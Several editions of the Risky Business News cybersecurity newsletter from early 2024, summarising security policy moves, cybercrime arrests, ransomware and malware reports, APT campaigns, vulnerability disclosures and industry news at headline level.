CISA SbD alert: CISA has asked SOHO router vendors to overhaul procedures and take security features into account when designing new products. The agency has urged vendors to include a firmware update mechanism in their routers and ship devices that have security features enabled by default. In addition, the agency also asked vendors to ship routers where the web management interface is only accessible from the internal LAN. CISA's requests are part of its Secure-by-Design initiative and were published on the same day the US disrupted a Chinese botnet of compromised SOHO routers.
White House OS3I report: The Biden Administration has published its year-in-review report covering the Open-Source Software Security Initiative (OS3I), a crucial component of its new National Cybersecurity Strategy. The 7-page document aggregates all of OS3I's efforts last year to secure open-source software and its impact on software supply chains.
SEC cybersecurity rules: The White House has told the Senate that President Biden would veto any attempts to walk back the SEC's new cybersecurity rules. [Additional coverage in The Record]
GAO ICS ransomware report: A GAO report found that federal agencies for critical sectors like manufacturing, energy, healthcare, and transportation systems are mostly blind to how companies in their industry vertical can deal with a ransomware attack. [Additional coverage in CyberScoop]
EUCC launched: The EU has formally launched the European Common Criteria-based cybersecurity certification scheme (EUCC), a cybersecurity certification framework for ICT (Information and Communication Technology) products, such as routers and other electronics. The scheme is based on the Common Criteria international standard.
EU commits to not pay ransoms: During a visit to Washington this week, EU Commissioner Thierry Breton formally committed the EU and its 27 member states to the Counter Ransomware Initiative. As part of this project, member states have pledged not to pay ransoms to cyber criminals extorting companies. More than 50 countries across the world pledged to support the project, although none have passed laws officially banning ransom payments yet.
EU-US cybersecurity cooperation: The EU and US had a meeting in Brussels to enhance their cooperation in cyberspace
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Bradon Rogers, Chief Customer Officer at enterprise browser Island, on how a modern enterprise browser solution like Island can be used to replace, complement, or enhance some enterprise security tools or technology stacks.
Cybercrime and threat intel
Operation Synergia: Interpol has detained 30 individuals as part of a global operation against malicious server infrastructure that enabled phishing, ransomware, and banking malware operations. The arrests took place between September and November 2023 and were part of Interpol's Operation Synergia. Twenty-six suspects were detained across Europe, and another four in South Sudan and Zimbabwe. According to Group-IB, Interpol and national security agencies managed to take down 70% of the servers they initially targeted.
DraftKings hacker sentenced: A New York judge has sentenced a 19-year-old from Wisconsin to 18 months in prison for his role in hacking user accounts on sports betting website DraftKings. According to prosecutors, Joseph Garrison used credential-stuffing attacks to take over accounts and then steal user funds. The teenager hacked more than 60,000 DraftKings accounts and stole $600,000 from around 1,600 of the site's users. Days before Garrison's sentencing, US authorities arrested and charged two other suspects involved in the attacks. The two helped Garrison sell the hacked accounts on their online cybercrime shops.
BTC-e arrest: The US Department of Justice has charged a Belarusian and Cypriot national for his role in operating BTC-e, a now-defunct cryptocurrency exchange that helped launder ransomware proceeds. Aliaksandr Klimenka, 42, was arrested in Latvia on December 21, 2023, and extradited and arraigned in a US court this week. He faces up to 25 years in prison on money laundering charges and for operating an unlicensed money services business. Klimenka is the second BTC-e operator to be detained after Russian national Alexander Vinnik, the platform's founder. Vinnik was detained in Greece in 2017 and extradited to the US in 2022.
Pig-butchering leaders arrested: Chinese officials have arrested ten Myanmar nationals who allegedly operated large-scale cyber scam centers in Myanmar's northern Kokang region. The suspects were detained after China issued an international arrest warrant in their names at the start of December last year. All ten are believed to have had leadership roles in running the scam centers, and some were also members of the Kokang Border Guard Force. The suspects were handed over to Chinese authorities on January 30.
Image via Irrawaddy
Russian mathematician arrested: The FSB has arrested a mathematician named Artem Khoroshilov for launching DDoS attacks against Russian critical infrastructure. [Additional coverage in TASS]
Akira exploits Cisco devices: The Akira ransomware gang is using a four-year-old vulnerability (CVE-2020-3259) in Cisco ASA and FTD devices as a way to breach corporate networks.
RansomedVC rebrand: The RansomedVC ransomware operation has rebranded under the new name of Raznatovic. The group's name change comes after the gang ruined its brand throughout 2023 after lying about many of its intrusions. RansomedVC's lies reached a peak in October 2023 when American insurance company State Farm was sued in a class-action lawsuit over a breach that never occurred. According to a new report from Analyst1's Jon DiMaggio, the group appears to be run by a Bulgarian national who previously worked as part of the now-defunct Ragnar Locker ransomware operation.
New DaaS project: CyFirma looks at CG, a new Drainer-as-a-Service project that provides access to a phishing kit specialized in compromising and draining cryptocurrency wallets.
ApateWeb: Palo Alto Networks has discovered a network of over 130,000 domains that are being used to deliver scareware, online scams, adware, and rogue browser extensions. The domains appear to be part of a coordinated campaign the company has called ApateWeb. The campaign has been active since August 2022 and appears to be primarily driven by malicious JavaScript code implanted on the compromised domains.
UNC4990: A financially motivated threat actor has been targeting organizations in Italy using a malware strain that spreads via USB devices. Tracked as UNC4990, the group has been active since early 2023. Its primary malware is a downloader EMPTYSPACE (aka VETTA Loader and BrokerLoader), which has been used to later deploy a backdoor named QUIETBOARD and cryptocurrency miners. The group's operations also stand out because of their use of Vimeo and tech news site ArsTechnica to host some parts of their malware.
State of WordPress 2023: Credential stuffing attacks have been the most common type of attack against WordPress sites in 2023. WordPress firewall provider Wordfence says it blocked more than 100 billion credential stuffing attempts throughout the year. Scans for exposed configuration files were the second most popular attack vector, while vulnerability exploitation was third. Wordfence notes that 2023 marked the first time that the exploitation of XSS vulnerabilities was the most popular vulnerability type. The company blames this on the rise of more sophisticated payloads designed to insert malicious administrative users and install backdoors via unpatched XSS bugs in themes and plugins.
Malware technical reports
Trigona to Mimic: AhnLab researchers have spotted the operators of the Trigona ransomware installing the Mimic ransomware on compromised MS-SQL servers.
Play ransomware: CyberArk has published a technical analysis of the Play ransomware encrypter.
Nitrogen: Malwarebytes has an update on Nitrogen, a malware spotted last year (Sophos, Bitdefender, eSentire, and Trend Micro), deployed via malicious ads, and used in attacks on corporate networks.
RedLine Stealer: Security researcher Ayush Anand has published a report on a RedLine Stealer sample seen in a recent phishing campaign.
Grandoreiro: ESET has published another technical report on Grandoreiro, the banking trojan they discovered in 2020 and recently helped Brazilian authorities take down.
DiceLoader: Sekoia researchers have published a report on DiceLoader, a malware loader used by the FIN7 cybercrime group.
DIRTYMOE (PurpleFox): Ukraine's CERT team says that more than 2,000 computers across the country have been infected with a malware strain named DIRTYMOE. Also known as PurpleFox, the malware has been active since 2018 but has mainly been active in China. Its operators began expanding in September 2023, when Proofpoint saw the first signs of operations targeting international users. Per Proofpoint's description, PurpleFox appears to be a MaaS.
"Proofpoint does not attribute all the Chinese-themed malware campaigns to the same threat actor at this time, but some activity clusters do overlap, suggesting threat actors may be using the same infrastructure to deliver multiple malware families."
FritzFrog: Akamai has discovered a new variant of the FritzFrog botnet that has now incorporated exploits for the Log4Shell vulnerability.
Commando Cat: Cado Security has discovered a new cryptomining botnet named Commando Cat that is currently targeting Docker servers. The botnet targets Docker instances that have their API endpoints exposed online. Once they compromise a host, the attacker escapes the container and runs malicious code on the underlying Docker host.
HeadCrab 2.0: AquaSec researchers have discovered a new version of HeadCrab, a crypto-mining malware strain known to infect Redis databases. The new version features fileless execution capabilities and a new command and control system. In addition, the malware's author also seems to be running a mini-blog in the malware's code (screenshot below).
Sponsor Section
Island is an enterprise browser that embeds access policies, data protection, and security controls to create a safe environment that works on unmanaged as well as managed endpoints. Take a look at Island's essential features below [PDF].
APTs, cyber-espionage, and info-ops
Patchwork's VajraSpy: ESET researchers have found 12 malicious Android apps containing a remote access trojan named VajraSpy. The company linked the apps to Patchwork, a Pakistani APT group. According to ESET, some of the apps managed to reach the Google Play Store, where they were downloaded more than 1,400 times. All apps are still available on third-party Android app stores. ESET identified 148 victims across both India and Pakistan.
Scaly Wolf: Security firm BI.ZONE is tracking a new threat actor named Scaly Wolf and its attacks on Russian organizations using phishing emails disguised as government communications. The final payload in these attacks is White Snake, an infostealer advertised on Telegram and used in a bunch of campaigns all over the place. The group appears to have been active since June 2023. BI.ZONE has not made any attribution about the threat actor yet.
"Continuing to distribute the White Snake stealer almost continuously, the group began to pose a serious threat to Russian businesses. Moreover, the fact that attackers send emails over and over under the guise of government services, especially the Investigative Committee of the Russian Federation, indicates the existence of a working scheme and the success of the ongoing campaigns. Judging by the attacks already committed in January 2024, Scaly Wolf will continue to attempt to compromise Russian companies and may not leave this field for quite some time."
APT28: Security firm Harfang believes that Russian cyber-espionage group APT28 is using a network of compromised Ubiquiti devices to proxy and hide its attacks against government organizations across Eastern Europe. Another report from security firm Trend Micro delves into APT28's (which they call Pawn Storm) use of a Net-NTMLv2 hash relay attack exploiting an Outlook vulnerability tracked as CVE-2023-23397. These attacks were first documented by Microsoft in this report last December.
Midnight Blizzard's attack flow: If you're having problems understanding how Midnight Blizzard (APT29) breached Microsoft's internal corporate email, Wiz researcher Amitai Cohen has you covered.
Volt Typhoon: In our last newsletter edition, we featured a Reuters exclusive about the US government's efforts to take down hacking infrastructure owned by Chinese APT group Volt Typhoon. The FBI and DOJ officially confirmed this on January 31. As we suspected, the two agencies obtained court orders to take down Volt Typhoon's infamous KV botnet. The top heads of the FBI, CISA, ODNI, and the NSA also appeared in a Senate hearing that discussed China's hacking campaigns targeting US critical infrastructure—embedded below. On the same day, German security firm DCSO also published a technical report on one of the KV botnet's clusters.
Vulnerabilities, security research, and bug bounty
Mastodon security update: The Mastodon project has released a security update to patch a security flaw tracked as CVE-2024-23832.
WordPress security update: The WordPress team has released a security update for the WordPress CMS that fixes two minor vulnerabilities.
Kubernetes security update: Google has released a security update for its Kubernetes engine.
iOS bug exploited in the wild:CISA says that a threat actor is exploiting an old 2022 vulnerability to compromise Apple devices. Tracked as CVE-2022-48618, the bug was initiallypatched in December 2022 but was listed in Apple's actual security advisories this year on January 9. Apple says it received a report that the vulnerability was exploited against versions of iOS released before iOS 15.7.1.
Linux vulnerabilities: Qualys security researchers have discovered a severe vulnerability in the GNU C Library (glibc) that impacts Linux operating systems. Tracked as CVE-2023-6246, the vulnerability affects major distros such as Debian, Fedora, Red Hat, and Ubuntu. The bug impacts versions going back to August 2022 and is an elevation of privilege flaw that can allow attackers with access to a system to get root access on the compromised host.
Vision Pro security update: Three days before its official launch, Apple has shipped the first security update for its Vision Pro VR headset. It's a fix for a WebKit zero-day (CVE-2024-23222) the company patched last week and, which it ported to its new device as well. [h/t Simon Tsui]
Leaky Vessels vulnerability: DevSecOps company Snyk has found four vulnerabilities in Linux-based container deployment tools such as Docker and RunC.
Apache OfBiz vulnerabilities: SecureLayer7 has published root cause analysis reports for several Apache OfBiz vulnerabilities, including one recently abused by the Syssrv botnet.
TP-Link vulnerability: CyFirma has published an analysis on CVE-2024-21833, a vulnerability in TP-Link's Archer and Deco router series discovered by JPCERT/CC.
MySQL RNG issues: The MySQL database—and its MariaDB offshoot—uses a weak RNG function that returns low entropy random numbers with predictable sequences.
EventLogCrasher zero-day: ACROS Security has published a micro-patch for an unpatched vulnerability that can crash the Windows Event Log on local or remote systems. The company provided a micro-patch after Microsoft declined to patch the issue. There are arguments this bug could be used to hide malicious behavior on already-compromised systems.
Infosec industry
Proofpoint layoffs: Proofpoint is laying off 280 employees, representing roughly 6% of its global workforce. The company becomes the latest cybersecurity vendor to lay off employees over the past few months after Splunk, Truesec, Malwarebytes, Secureworks, and Rapid7.
Okta layoffs: Identity provider Okta announced plans to lay off 400 employees, representing 7% of its staff. The company fired another 300 employees exactly a year ago, on February 1, 2023. [Additional coverage in CybersecurityDive]
Avast/AVG stop working in Russia: The free versions of the Avast and AVG antivirus programs have stopped working for Russian users. The company announced its intention to stop catering to the Russian and Belarusian markets in March 2022, shortly after Russia's invasion of Ukraine. Avast's CCleaner app also stopped working as well.
New tool—SmuggleFuzz: Security researcher Charlie Smith has released a free tool named SmuggleFuzz, an HTTP/2-based downgrade and smuggle scanner.
New tool—CSS Canarytoken: Thinkst has launched a new version of its Cloned Website Canarytoken. The new version works via CSS, and just like the first JS-based version, it can help website owners when attackers are attempting AitM phishing attacks against one of your domains.
Tool update—ANY.RUN: The ANY.RUN platform now supports running and analyzing Linux malware.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how the war in Ukraine is showing how useful mobile devices are in a war. Using them is risky, but those risks need to be managed.
This newsletter is brought to you by enterprise browser maker Island. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Brazil's Federal Police has detained five members of Grandoreiro, a malware gang specialized in stealing funds from banking customers with a custom-built banking trojan.
The group has been active since 2019 and is believed to have stolen at least $3.9 million from customers at banks in Brazil, Mexico, and Spain.
Brazilian officials say Spanish financial institution CaixaBank identified the Grandoreiro members and worked with Interpol and Spanish police to get them detained.
Besides the five arrests, officials raided 13 homes and also seized funds and physical assets owned by the group.
According to reports from ESET, Trustwave, and Zscaler, Grandoreiro is a malware strain written in Delphi designed to target Windows systems.
It operated by showing popups, manipulating browsers, and capturing keystrokes in order to collect the credentials and cookies needed to access a victim's bank and other online accounts.
Breaches, hacks, and security incidents
GUR hack in Russia: One of Ukraine's military intelligence agencies says it hacked and wiped servers at IPL Consulting, a Russian company that provides IT services for Russia's industrial sector. Officials from Ukraine's Defence Intelligence Main Directorate (GUR) say they wiped more than 60TB of data from dozens of servers and databases. GUR officials say they also worked with a group of "unknown cyber volunteers in Russia" to cripple the infrastructure of Akado-Telekom, an ISP used by the Putin administration, the FSB, the FSO, the Moscow local administration, and Sberbank.
SOMESING crypto-heist: A threat actor has stolen $11.5 million worth of crypto assets from SOMESING, a blockchain-based karaoke platform. The company says it investigated the incident and found no evidence that its staff was involved in any malicious activity. SOMESING says it reported the hack to South Korean law enforcement.
Goledo Finance crypto-heist: Cryptocurrency platform Goledo Finance lost $1.7 million worth of assets in a hack on January 28. The company blamed the loss on a flash loan attack. In a blockchain transaction, Goledo asked the hacker to return the stolen funds for a white hat reward.
Smartmatic legal case: Voting machine maker Smartmatic claims that the president of far-right TV network One America News (OAN) was in possession of a spreadsheet containing passwords of Smartmatic employees. Smartmatic claims OAN President Charles Herring and the network "may have engaged in criminal activities" to obtain the spreadsheet. In a lawsuit filed against OAN, the company says Herring sent the spreadsheet to one of Donald Trump's campaign lawyers in 2021. Smartmatic believes the passwords were used in attempts to access voting systems across the US to prove voter fraud during Trump's 2020 lost election. [Additional coverage in CNN]
Schneider Electric ransomware incident: Energy equipment maker Schneider Electric has fallen victim to a ransomware attack. The incident took place on January 17 and primarily impacted the company's Resource Advisor cloud platform. According to BleepingComputer, the Cactus ransomware group is behind the attack, and they are believed to have stolen terabytes of corporate data.
Romanian govt ransomware incident: A ransomware gang has breached and stolen 250GB of data from the IT systems of Romania's Chamber of Deputies, the country's lower house of Parliament. The Knight ransomware group took credit for the attack in a now-deleted post on their dark web leak site. The group claimed it obtained copies of government contracts, salary information, and copies of national IDs for Romania's top politicians. Romanian officials confirmed the incident for local media after the gang posted national ID copies for the country's prime minister and one of its opposition leaders. [Additional coverage in Hotnews.ro and News.ro]
General tech and privacy
Italy finds ChatGPT violates GDPR: Italy's data protection agency has found that OpenAI's ChatGPT system violates the EU's GDPR regulation. The agency issued a temporary ban against ChatGPT in March of last year, alleging that OpenAI was unlawfully collecting user data. Officials have given the company 30 days to file a formal counterclaim before they make a final ruling and impose a fine.
Major IT outage in Russia: A major IT outage took place on Tuesday, January 30, across the Russian internet space due to a DNSSEC error at Russia's .ru national domain registrar. According to Russian tech experts, the outage was likely caused by a government's attempt to create its own national DNS system, separate from the international one.
Android app security update: Google has introduced a new feature for Android app makers that will allow developers to prompt users to update outdated app versions. Google says it introduced the feature after noticing that more than 50% of Android users respond to Play Store prompts. The new system is meant to complement Android's app auto-update and in-app update systems.
Government, politics, and policy
New cybercrime penalties in Italy: The Italian government is working on a law that will raise penalties for cybercrime offenses to between two and 12 years. Harsher penalties will be applied if the cyberattacks affect national security and involve the use of force or public officials. Cybercriminals who cooperate with police can have their sentence reduced by up to two-thirds. Italy's current legislation includes jail terms between one and eight years. [Additional coverage in Reuters]
Farm and Food Cybersecurity Act: US lawmakers have introduced the Farm and Food Cybersecurity Act, new legislation designed to strengthen cybersecurity practices across the US agricultural sector.
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Bradon Rogers, Chief Customer Officer at enterprise browser Island, on how a modern enterprise browser solution like Island can be used to replace, complement, or enhance some enterprise security tools or technology stacks.
Cybercrime and threat intel
ISIS cyber sanctions: The US Treasury Department has sanctioned an Egyptian couple for providing cybersecurity training to ISIS leaders and supporters. US officials say the couple ran the Electronic Horizons Foundation, an online platform also known as Afaq [PDF]. The Afaq site hosted tutorials on how to set up secure computers, how to securely donate cryptocurrency to ISIS, and provided a platform for secure conversations. The Afaq portal shut down in March 2022 in the aftermath of a cyberattack.
Vastaamo hack: In the trial of Julius Aleksanteri Kivimäki, the hacker who extorted victims of the Vaastamo healthcare provider, Finnish authorities claim to have found a way to trace his Monero transactions. Authorities have not released any technical details, and the method still remains unclear. [Additional coverage in CoinTelegraph]
"As per the Finnish police, the hacker received payments in Bitcoin and sent the funds to an exchange that was not compliant with Know Your Customer (KYC) guidelines before swapping for Monero and then transferring the funds to a dedicated Monero wallet."
Sosa profile: Infosec reporter Brian Krebs has published a profile on Noah Michael Urban, the 19-year-old from Florida believed to be a member of the Scattered Spider gang. Urban was detained earlier this year.
Former FSB officer trial delayed: The trial of a former FSB officer accused of taking bribes from hackers has been delayed. The former officer from the city of Perm was accused of taking a $1 million bribe from a hacking group to arrange their release from prison and dismissal of their criminal case. He was detained in September 2023.
Major BTC seizure: German authorities have taken custody of more than €2 billion worth of Bitcoin from one of the operators of movie2k.to, a now-defunct movie piracy portal. The funds were voluntarily transferred to officials by the site's programmer, who's been in pre-trial detention since 2019. In 2020, he also handed over control of the site's domain to authorities. Other movie2k.to admins are still at large and are believed to have similar Bitcoin holdings as the staff were early adopters of the cryptocurrency. [Additional coverage in DerSpiegel]
DarkNetLive scandal: A Darkdot article claims that DarkNetLive—the last standing news sites covering the dark web—has been secretly acquired in November 2022 by Incognito, a darknet drug marketplace. Darkdot claims Incognito has been using the news site to suppress criticism and steer public perception in their favor.
DarkGate via Teams: AT&T's AlienLabs is seeing Microsoft Teams phishing campaigns distributing DarkGate-infected files.
GitHub spam campaign: Code hosting platform GitHub is seeing a rise in cryptocurrency spam after threat actors have found a loophole in the company's defenses. The trick revolves around posting crypto-spam in GitHub commits and issue trackers and then immediately deleting the messages. Project owners receive the spam via email, but because the original content was deleted, they can't report it.
Greatness PhaaS: Trustwave researchers have seen a rise in phishing pages created via the Greatness Phishing-as-a-Service portal.
Phishing kit ecosystem: Guardio Labs looks at the phishing kit ecosystem that's currently flourishing on Telegram channels.
Yahoo Boys: A report from the Network Contagion Research Institute looks at how groups of scammers across West Africa—sometimes referred to as Yahoo Boys—have slowly switched from email financial fraud to social media-enabled sextortion schemes. The report looks at the underground scene that sells sextortion manuals, common tactics and patterns, and how some of these criminals/groups often brag about successful sextortions online without fear or shame. [Additional details in NCRI's report/PDF]
Malware technical reports
Trigona ransomware: The DFIR Report team has published a report on typical Trigona ransomware infections, which typically end up with file encryption with 3h.
CrackedCantil: ANY.RUN researcher Lena Y. has published a report on CrackedCantil, a malware strain distributed via cracked and pirated software. The malware appears to work as a downloader for various other threats.
Ermac: IBM's Trusteer team has published a report on Ermac, an Android banking trojan active since September 2022.
Sponsor Section
Island is an enterprise browser that embeds access policies, data protection, and security controls to create a safe environment that works on unmanaged as well as managed endpoints. Take a look at Island's essential features below [PDF].
APTs, cyber-espionage, and info-ops
Volt Typhoon secret takedowns: The US government has taken steps to disable hacking infrastructure used by a Chinese cyber-espionage group named Volt Typhoon. Discovered in early 2023, the group has been linked to intrusions at US government agencies and critical infrastructure operators. Although not confirmed, the secretive takedown most likely targeted KV, an IoT botnet operated by the Volt Typhoon group. [Additional coverage in Reuters]
Russian APT: Security firm Cluster25 says the Russian government is most likely behind a spear-phishing campaign that targeted independent journalists and Russian dissident movements inside and beyond the nation's borders. The campaign took place and was spotted earlier this month by Russian journalists from Bellingcat and The Bell. It consisted of a spear-phishingcampaign that attempted to install shells on victims' computers. Details below from our January 15 edition.
China's 2023 APT report: Chinese security firm Qihoo 360 claims that the CIA was the seventh most active APT group in China last year. Qihoo tracked 135 APTs last year, including 46 new groups. The company says that DarkHotel (APT-C-06) and Parasite (APT-C-68) were the two cyber-espionage groups that used the most zero-days last year. [Full report/PDF]
Vulnerabilities, security research, and bug bounty
Chrome zero-day details: South Korean firm Theori has published a technical breakdown of CVE-2023–2033, a Chrome zero-day that was exploited in the wild and patched in April 2024.
Hitron zero-days: The operators of the InfectedSlurs botnet have used six zero-days in DVRs from South Korean company Hitron Systems. According to internet infrastructure company Akamai, the zero-days were used to infect the Hitron DVRs with DDoS malware. Patches for all six zero-days were released on January 30.
Jenkins exposure: More than 45,000 Jenkins servers are currently exposed on the internet and are vulnerable to attacks with a flaw in the application's CLI component. Tracked as CVE-2024-23897, the vulnerability was discovered by SonarSource researchers and patched last week. It has a severity rating of 9.8/10 and allows attackers to retrieve cryptographic keys, delete files, or run malicious code. Proof-of-concept code has been published online, and early scanning activity has already been observed.
Ivanti patches delayed: Enterprise software maker Ivanti has delayed crucial patches meant to fix two zero-days in its Connect Secure VPN devices. Ivanti released temporary mitigations for its customers at the start of the month and promised to have firmware updates by January 22. More than a week later, Ivanti has yet to release the updates and to provide an explanation for its delay. Tracked as CVE-2023-46805 and CVE-2024-21887, the two zero-days have been exploited in the wild by a Chinese APT group named UTA0178 since early December of last year.
Android OEM issue: Meta's Red Team X has found that several major Android OEMs sign their APEX modules with private keys from the Android project's public source code repository. Researchers say the issue could have allowed threat actors to forge updates for APEX, a file format used to ship Android system components. Meta says most vendors have fixed the issue in December 2023 security updates—tracked as CVE-2023-45779.
Tor security audit: The Tor Project published its recent security audit for the source code of the Tor network and its browser.
Splunk security updates: Splunk has released security patches to fix three vulnerabilities in its products.
Infosec industry
New tool—White Phoenix web version: CyberArk has released a web version of White Phoenix, a tool that can be used in some limited cases to recover files that have been encrypted using intermittent encryption.
New tool—PolEx: DoyenSec has open-sourced a tool named PolEx, a Visual Studio Code extension to analyze Infrastructure as Code (IaC) architectures and the points where a web application and the underlying infrastructure intersect.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how the war in Ukraine is showing how useful mobile devices are in a war. Using them is risky, but those risks need to be managed.
This newsletter is brought to you by enterprise browser maker Island. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Federal investigators are warning companies not to delete chats and preserve conversations that have taken place via business collaboration and ephemeral messaging platforms.
In press releases on Friday, the US Department of Justice and the US Federal Trade Commission announced that they updated the language in their preservation letters and specifications—documents they send to companies under federal investigations.
The new language updates evidence preservation procedures to cover modern tech stacks such as Slack, Microsoft Teams, and Signal.
Companies that receive subpoenas or other legal notifications will have to take steps to preserve chat logs and disappearing IM messages.
Companies that fail to comply will be charged with obstruction of justice.
"These updates to our legal process will ensure that neither opposing counsel nor their clients can feign ignorance when their clients or companies choose to conduct business through ephemeral messages," said Deputy Assistant Attorney General Manish Kumar of the Justice Department’s Antitrust Division.
The new guidance comes as the DOJ faced difficulties in its Google and Amazon antitrust lawsuits.
In February 2023, the DOJ accused Google of lying when it claimed it auto-suspended its chat auto-deletion feature. In addition, the DOJ claimed that for a period of four years, Google trained employees to delete internal chats and move conversations to off-the-record platforms because it anticipated facing antitrust litigation in the near future.
In November 2023, the FTC similarly accused Amazon of deleting more than two years worth of internal Signal employee chats after the agency started a multi-state antitrust lawsuit.
Breaches, hacks, and security incidents
Mercedes-Benz leak: German automaker Mercedes-Benz accidentally exposed all of its source code after it left a GitHub access token exposed online. Security researchers from RedHunt Labs discovered the leak. Researchers say the token granted access to the company's GitHub Enterprise Server, where they found API keys to pivot inside the company's Azure and AWS cloud infrastructure. [Additional coverage in TechCrunch]
SolarWinds files to dismiss SEC lawsuit: Software maker SolarWinds has filed a motion to dismiss its SEC lawsuit in a New York court. The SEC sued SolarWinds and its CISO in October of last year arguing that the company lied about its cybersecurity posture to investors for years before it was hacked in 2020. SolarWinds says it disclosed all risks surrounding its business and informed investors when the hack took place. In a statement to Bloomberg Law, the company argues that the SEC is trying to "move the goalposts" and create new reporting requirements about a company's internal cybersecurity programs.
General tech and privacy
Windows Server 2025 & Insiders: Microsoft has launched an Insiders distribution channel for the Windows Server operating system. The channel will be used to test Windows Server features before they are shipped. The new channel will be available for Windows Server 2025, the next version of the Windows Server OS, announced on the same day. Windows Server 2025 will ship with universal hotpatching support, new versions for the AD and SMB protocols, Hyper-V and AI support.
Notepad update: Microsoft's engineers are working on sandboxing the Notepad editor's process.
Meta's data scraping case: A US judge ruled that Israeli company Bright Data did not violate Meta's terms of service when it scraped data from Facebook and Instagram. Meta sued the company in February 2023. The judge ruled that Bright Data didn't violate Meta's terms of service because it wasn't logged into a Meta account when it did the scraping—hence, the information was public anyway. As part of its defense, Bright Data revealed that Meta was one of its past customers and had paid past to scrape other websites. [Additional coverage in CourthouseNews]
Twitter propaganda: Ahead of elections all over the world, Twitter is currently flooded with the most abhorrent political disinformation and misinformation. Someexamplesflooding the site these days. [Additional coverage in DerSpiegel, NYT, and Vice]
iOS notification abuse: Multiple popular iOS apps are abusing the short time interval they receive a notification to send analytics back to their servers. The hidden behavior was discovered by German security researcher Tommy Mysk. The researcher says the apps are abusing a feature introduced in iOS 10 that allows apps to be woken up for a short period of time to process a notification before being put back to sleep. Mysk says that apps such as Facebook, TikTok, Twitter, LinkedIn, and Bing are abusing this small time window to collect and track users on their phones.
Government, politics, and policy
Brazil spyware scandal: Brazilian authorities have started an investigation against the country's former intelligence chief for organizing a mass surveillance campaign against the political rivals of former president Jair Bolsonaro. Brazilian Federal Police say they raided several homes owned by Alexandre Ramagen, the former head of ABIN, the country's intelligence agency. Officials say Ramagen created a "parallel structure" inside ABIN that targeted state governors, lawmakers, judges, and journalists. The ABIN unit allegedly used a spying tool named FirstMile, developed by Israeli company Cognyte. [Additional coverage in El Pais]
Ukraine cyber defense fund: The Danish government plans to send $13.25 million to boost Ukraine's cyber defense capabilities against cyber attacks.
USSS cyber board: The US Secret Service is reestablishing its Cyber Investigations Advisory Board. The Board was initially established in 2020 to help the agency overhaul its cyber investigations practices. The reestablished Board will include members from the public sector, academia, and non-profit organizations, who will advise the Secret Service on its cyber investigations. [Additional coverage in CyberScoop]
NSA confirms buying internet metadata: The US National Security Agency is buying internet traffic metadata known as netflow from commercial data brokers. The agency has confirmed the purchases in a letter to US Senator Ron Wyden. The NSA says it uses the data for mission-related activities, such as national security, cybersecurity, and foreign intelligence collection. NSA Director Paul Nakasone says the agency has taken steps to minimize cases where it buys data on Americans, such as not acquiring data from US smart cars. The agency also doesn't buy netflow data exchanged between US internet providers, but it buys netflow data between US and foreign providers.
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Bradon Rogers, Chief Customer Officer at enterprise browser Island, on how a modern enterprise browser solution like Island can be used to replace, complement, or enhance some enterprise security tools or technology stacks.
Cybercrime and threat intel
Ransomware operator sentenced: A Canadian judge has sentenced an Ottawa man to two years in prison for launching ransomware attacks. Officials say Matthew Philbert infected more than 1,100 victims with ransomware using malicious emails. The 33-year-old is believed to have made $50,000 from his attacks, and some of his victims included police departments and children's charities. [Additional coverage in CBC]
Russian hacker detained: Ukraine's Security Service SBU has detained a member of pro-Kremlin hacking group Russia's Cyber Army. The suspect was identified as an IT specialist from Kharkiv who was recruited by the FSB through a specialized Telegram channel. Officials say the suspect prepared DDoS attacks against Ukrainian government sites and also adjusted Russian strikes against civilian targets in Kharkiv.
Serial swatter arrested in California: The FBI has arrested a 17-year-old from California on charges of orchestrating hundreds of swatting attacks across the US. Officials have described the teenager as one of the most prolific swatters in American history. He is suspected of orchestrating swatting events targeting schools, politicians' homes, courthouses, and religious institutions. The unnamed teen is also suspected to have operated Torswats, a Swatting-as-a-Service operation hosted on a Telegram channel. [Additional coverage in Wired]
Ermakov profile: Threat intel firm Intel471 has published a profile on REvil member Aleksandr Gennadievich Ermakov, the Russian behind the Medibank attack, recently sanctioned by Australian, UK, and US officials. In the meantime, there's a discussion that the ASD might have identified the wrong REvil member behind the Medibank attack.
Knight interview: Threat intelligence analyst Marco A. De Felice has published an interview with the operators of the Knight ransomware, a revamped version of the older Cyclops RaaS.
Malvertising in China: Malwarebytes looks at some malvertising campaigns targeting Chinese consumers with boobytrapped instant messaging apps.
Treewolf: Chinese security firm Duba Security has published a report on Treewolf, a threat actor infecting Chinese users with malware using classic state tax administration lures.
Dark Mosquito: Chinese security firm Antiy has published a report on Dark Mosquito, a threat actor targeting Chinese users with Windows, Linux, and macOS malware. Most of the group's operations rely on pirated software and malicious ads to deliver their payloads.
YouTube AI scam ads: It took an investigation and public shaming from a news outlet for Google to delete thousands of AI-generated ads that promoted Medicare scams for months. [Additional coverage in 404 Media]
New npm malware: 767 (yes, 767) malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
2023 cybercrime trends: Security firm RedSense published a report with the most common trends spotted across the cybercrime ecosystem last year. Examples include "ghost" cybercrime groups, actor profile diversification, black hat SEO, and attempts to weaponize AI.
2023 mobile threats: Mobile security firm Lookout has published its year-in-review report for 2023. Just as before, Android threats dominated the threat landscape.
Fewer ransomware victims are paying: The number of ransomware victims who opted to pay ransoms fell to an all-time low at the end of last year. Cybersecurity firm Coveware estimates that 29% of victims paid ransoms in Q4 2023, down from the 85% registered in Q1 2019 when the company began tracking the stat. Coveware attributes the fall to improved data backup and recovery strategies in corporate environments and companies getting smarter about not trusting empty promises made by ransomware groups.
Malware technical reports
PixPirate: IBM's Trusteer security division has discovered a new Android RAT that is currently used in the wild in attacks targeting the customers of Brazilian banks. Named PixPirate, the malware heavily utilizes anti-research techniques and goes after payment details used by Pix, a popular Brazilian payment system.
"PixPirate is not only an automated attack tool, but it also has the capability of becoming a manually operated remote control attack tool. This capability is probably implemented to manually execute fraud if the automatic fraud execution flows fail because the user interface of the banking app changes or if a new lucrative target presents itself."
